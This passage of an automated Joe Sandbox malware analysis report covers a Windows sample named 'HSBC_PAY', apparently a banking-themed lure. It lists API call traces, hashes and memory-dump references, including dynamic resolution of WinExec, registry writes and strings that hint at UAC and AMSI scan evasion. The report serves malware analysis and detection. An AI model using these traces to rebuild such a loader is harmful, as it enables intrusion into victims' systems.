                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$Exec
                                                                    • String ID: Kernel32$WinExec
                                                                    • API String ID: 2292790416-3609268280
                                                                    • Opcode ID: b3ae0fa4a20340975f04ef4762514060861c476eb75732e1b1344ac79dc83b78
                                                                    • Instruction ID: edfeed0a54cb986d0ade6a0b677881182c79a21a7dddfc81bf0db185c07ffa1e
                                                                    • Opcode Fuzzy Hash: b3ae0fa4a20340975f04ef4762514060861c476eb75732e1b1344ac79dc83b78
                                                                    • Instruction Fuzzy Hash: 77016D34680204BFEF10EAA5DD01B5A77E9EB4A710F918460B504DAA40DE38AD118B21
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • WinExec.KERNEL32(?,?), ref: 02A98470
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$Exec
                                                                    • String ID: Kernel32$WinExec
                                                                    • API String ID: 2292790416-3609268280
                                                                    • Opcode ID: 35eaf52dbb2a82d436f2050fa52526575f35bf9ee9b72535b35131b1f9a2a3ae
                                                                    • Instruction ID: c1294ad778112a3b40275f0d28538d128ae2884b5d1d2f15e40ce135982e71d2
                                                                    • Opcode Fuzzy Hash: 35eaf52dbb2a82d436f2050fa52526575f35bf9ee9b72535b35131b1f9a2a3ae
                                                                    • Instruction Fuzzy Hash: 2AF08134680204BFEF10EFA5DD01B5A77EDFB4A710F918460B504DBA40DE38AD118B21
                                                                    APIs
                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02A95CF4,?,?,02A93880,00000001), ref: 02A95C08
                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02A95CF4,?,?,02A93880,00000001), ref: 02A95C36
                                                                      • Part of subcall function 02A87D10: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02A93880,02A95C76,00000000,02A95CF4,?,?,02A93880), ref: 02A87D5E
                                                                      • Part of subcall function 02A87F18: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02A93880,02A95C91,00000000,02A95CF4,?,?,02A93880,00000001), ref: 02A87F37
                                                                    • GetLastError.KERNEL32(00000000,02A95CF4,?,?,02A93880,00000001), ref: 02A95C9B
                                                                      • Part of subcall function 02A8A6F8: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02A8C359,00000000,02A8C3B3), ref: 02A8A717
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                    • String ID:
                                                                    • API String ID: 503785936-0
                                                                    • Opcode ID: 837aaf2d184e7f8a60f54bdc82683df78016bb28227e108b7b0181768837fec4
                                                                    • Instruction ID: e45bb7b5cdd365bb2bab279e0d807208d503ad5706da451e8e206eab8a0cbde8
                                                                    • Opcode Fuzzy Hash: 837aaf2d184e7f8a60f54bdc82683df78016bb28227e108b7b0181768837fec4
                                                                    • Instruction Fuzzy Hash: 42317F30E402059FDF01EBA9CA81B9EBBF6AB49714F908465E504AB380EF759905CFA5
                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,02BD5914), ref: 02A9E6FC
                                                                    • RegSetValueExA.ADVAPI32(000008DC,00000000,00000000,00000001,00000000,0000001C,00000000,02A9E767), ref: 02A9E734
                                                                    • RegCloseKey.ADVAPI32(000008DC,000008DC,00000000,00000000,00000001,00000000,0000001C,00000000,02A9E767), ref: 02A9E73F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenValue
                                                                    • String ID:
                                                                    • API String ID: 779948276-0
                                                                    • Opcode ID: 371c282ba7612c316f6dc585920227aeddb2b13596ed56faa7446593795759b7
                                                                    • Instruction ID: 1def5e410ab63bf9361f61ec953e6efa19656db4d2cdb32ac06db096d3aaa049
                                                                    • Opcode Fuzzy Hash: 371c282ba7612c316f6dc585920227aeddb2b13596ed56faa7446593795759b7
                                                                    • Instruction Fuzzy Hash: E1110D71A90605AFEB10FBA8DA91DAE7BEDEB09750F900461F604D7250EE34DE408B61
                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,02BD5914), ref: 02A9E6FC
                                                                    • RegSetValueExA.ADVAPI32(000008DC,00000000,00000000,00000001,00000000,0000001C,00000000,02A9E767), ref: 02A9E734
                                                                    • RegCloseKey.ADVAPI32(000008DC,000008DC,00000000,00000000,00000001,00000000,0000001C,00000000,02A9E767), ref: 02A9E73F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenValue
                                                                    • String ID:
                                                                    • API String ID: 779948276-0
                                                                    • Opcode ID: 83bc0dfc5e0375a7c43764ccda4910f1d59b0bec2f597fbdd48c8f6d5cf2249e
                                                                    • Instruction ID: 6c9fb9a9ff401184ee73c9fb7cbb8230b5185d34f8a728f356634457851a2fa9
                                                                    • Opcode Fuzzy Hash: 83bc0dfc5e0375a7c43764ccda4910f1d59b0bec2f597fbdd48c8f6d5cf2249e
                                                                    • Instruction Fuzzy Hash: 89111F71A90605AFEB10FFA8DA91DAE7BEDFB09750F900461F604D7250EF34DA408B61
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    • Opcode ID: a404adc60cd9ed6f7b1cd8c59751463ea01553cce012c9bed8b2c709122eca05
                                                                    • Instruction ID: f6946718a51e9db7b8e059647b9a395192d7a00c9beaaa21576175b6b666dd94
                                                                    • Opcode Fuzzy Hash: a404adc60cd9ed6f7b1cd8c59751463ea01553cce012c9bed8b2c709122eca05
                                                                    • Instruction Fuzzy Hash: 71F0C230748210EBDF247B398FC8A6927AADF0071174454A6B4069B205EF34CC0ACFA2
                                                                    APIs
                                                                    • SysFreeString.OLEAUT32(02A9E948), ref: 02A84C1A
                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 02A84D07
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02A84D19
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: String$Free$Alloc
                                                                    • String ID:
                                                                    • API String ID: 986138563-0
                                                                    • Opcode ID: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                                                    • Instruction ID: 0e18b239b23b09f36631c15fd226cf8db7d14666720df8d12bd13969fdd02f59
                                                                    • Opcode Fuzzy Hash: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                                                    • Instruction Fuzzy Hash: 9DE012F81052025EEB143F219D80B377B6EAFD5755F5444A9A904CE150FF38C842AE35
                                                                    APIs
                                                                    • SysFreeString.OLEAUT32(?), ref: 02A9735A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FreeString
                                                                    • String ID: H
                                                                    • API String ID: 3341692771-2852464175
                                                                    • Opcode ID: c91b5410085988d2d1ec07e32fea0d814f88458fd1b85db900e706e2e0bd8c7e
                                                                    • Instruction ID: 9fd7e2c297e8ac8a4ed4cf81030bc83c72bbf4c41cf628158800d5e5c1c828f3
                                                                    • Opcode Fuzzy Hash: c91b5410085988d2d1ec07e32fea0d814f88458fd1b85db900e706e2e0bd8c7e
                                                                    • Instruction Fuzzy Hash: B2B1C2B5A116089FDF14CF99D980A9DFBF6FF49314F2481A9E805AB364DB30A845CF60
                                                                    APIs
                                                                    • VariantCopy.OLEAUT32(00000000,00000000), ref: 02A8E701
                                                                      • Part of subcall function 02A8E2E4: VariantClear.OLEAUT32(?), ref: 02A8E2F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCopy
                                                                    • String ID:
                                                                    • API String ID: 274517740-0
                                                                    • Opcode ID: e0fcfa6ab0196594ec3d0d4240bda4ef7f9f3cb867aab1d4892ea91cb4059cf9
                                                                    • Instruction ID: 370052226d00b2cde5b428f3bb3898115c127834523a0cf4bc2e5c18ca478f0b
                                                                    • Opcode Fuzzy Hash: e0fcfa6ab0196594ec3d0d4240bda4ef7f9f3cb867aab1d4892ea91cb4059cf9
                                                                    • Instruction Fuzzy Hash: 2A118E30B40260D7CB34BF69DBC4A6A67EAAF857507045426F65A8B245EF30CC01CAA6
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02A81A03,?,02A81FC1), ref: 02A815E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID: 0`
                                                                    • API String ID: 4275171209-3339448193
                                                                    • Opcode ID: add972bc7acc2ef4a92522c61f5286ad7017d51e73b6bd67c71745ca5edaf55d
                                                                    • Instruction ID: 1cb54a27b290b0ed311a949e5465a9e09b5c50197753cf35559981f19ace9b5c
                                                                    • Opcode Fuzzy Hash: add972bc7acc2ef4a92522c61f5286ad7017d51e73b6bd67c71745ca5edaf55d
                                                                    • Instruction Fuzzy Hash: 79F0E7F0B923008BEB89DF799A843056BE6E789344F548579D60ADF298EB7194128B10
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: InitVariant
                                                                    • String ID:
                                                                    • API String ID: 1927566239-0
                                                                    • Opcode ID: 3e79267999b6b5242d3f16a2a71d3a9967833baf4dbe892407379654a63e3f31
                                                                    • Instruction ID: 25031744d72b088c992fab5deff573fd5e2a2c6559c28f3c20321fb8aaef69a9
                                                                    • Opcode Fuzzy Hash: 3e79267999b6b5242d3f16a2a71d3a9967833baf4dbe892407379654a63e3f31
                                                                    • Instruction Fuzzy Hash: E9314D71A00218EBDF10EFA8CA84AAA77F8FB0D314F5445A5F909D3250DB31DD91CBA5
                                                                    APIs
                                                                    • CLSIDFromProgID.OLE32(00000000,?,00000000,02A96D39,?,?,?,00000000), ref: 02A96D19
                                                                      • Part of subcall function 02A84C0C: SysFreeString.OLEAUT32(02A9E948), ref: 02A84C1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FreeFromProgString
                                                                    • String ID:
                                                                    • API String ID: 4225568880-0
                                                                    • Opcode ID: 5a1c167f8c4887130998384bf069301f1aa8526a94bb69a8454fd3717e0edcb7
                                                                    • Instruction ID: edf513c87d42369feed5ef821219345b930e278fe648d2fc65f293b02758a853
                                                                    • Opcode Fuzzy Hash: 5a1c167f8c4887130998384bf069301f1aa8526a94bb69a8454fd3717e0edcb7
                                                                    • Instruction Fuzzy Hash: 59E0E530640704BFE700FBAACD11D5A7BEDEF49B10B510471A800D7500EE345D008860
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(02A80000,?,00000105), ref: 02A85832
                                                                      • Part of subcall function 02A85A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A80000,02AAD790), ref: 02A85A94
                                                                      • Part of subcall function 02A85A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A80000,02AAD790), ref: 02A85AB2
                                                                      • Part of subcall function 02A85A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A80000,02AAD790), ref: 02A85AD0
                                                                      • Part of subcall function 02A85A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02A85AEE
                                                                      • Part of subcall function 02A85A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02A85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02A85B37
                                                                      • Part of subcall function 02A85A78: RegQueryValueExA.ADVAPI32(?,02A85CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02A85B7D,?,80000001), ref: 02A85B55
                                                                      • Part of subcall function 02A85A78: RegCloseKey.ADVAPI32(?,02A85B84,00000000,?,?,00000000,02A85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A85B77
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                    • String ID:
                                                                    • API String ID: 2796650324-0
                                                                    • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                    • Instruction ID: f021a1d83f138e8b36f06716e9d6eac5b2936c7c010b918ea2c1dbad137460e9
                                                                    • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                    • Instruction Fuzzy Hash: 83E06571A002148BCB10EF6889C0A9637D8BB08750F8109A6EC98DF34ADBB0D9248BE0
                                                                    APIs
                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02A87DA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                    • Instruction ID: bbb7c0205fa60e285da61cf37f42f1fa9b41f5972180fd05b454acf93ccfc29c
                                                                    • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                    • Instruction Fuzzy Hash: 4DD05B763082507AE324A65A5D84EFB5BDCCFC9770F104639B658C3180E7208C0187B1
                                                                    APIs
                                                                    • GetFileAttributesA.KERNEL32(00000000,?,02AA2A41,ScanString,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,Initialize), ref: 02A87E3F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
                                                                    • Instruction ID: 65f94da6000ed9f7f9e84745435ad37af9d5e373d4493ef43fc703a0106c8f07
                                                                    • Opcode Fuzzy Hash: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
                                                                    • Instruction Fuzzy Hash: 66C08CA62022040E2E60B3FC0DC490A42CD29081383B02F61E178CA1D2DF21D8522810
                                                                    APIs
                                                                    • GetFileAttributesA.KERNEL32(00000000,?,02A9F8C4,ScanString,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanString,02AE137C,02AAAFD0,UacScan,02AE137C,02AAAFD0,UacInitialize), ref: 02A87E1B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                                                                    • Instruction ID: 5a3ddfa591d1ae8fb3977a724755d3fdd2f446b49dbec9d070408e47027c7e37
                                                                    • Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                                                                    • Instruction Fuzzy Hash: FEC08CE62222020A2A64B2FC0DC442A42C819081383B42F21F278DA2E2DF218C232820
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FreeString
                                                                    • String ID:
                                                                    • API String ID: 3341692771-0
                                                                    • Opcode ID: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
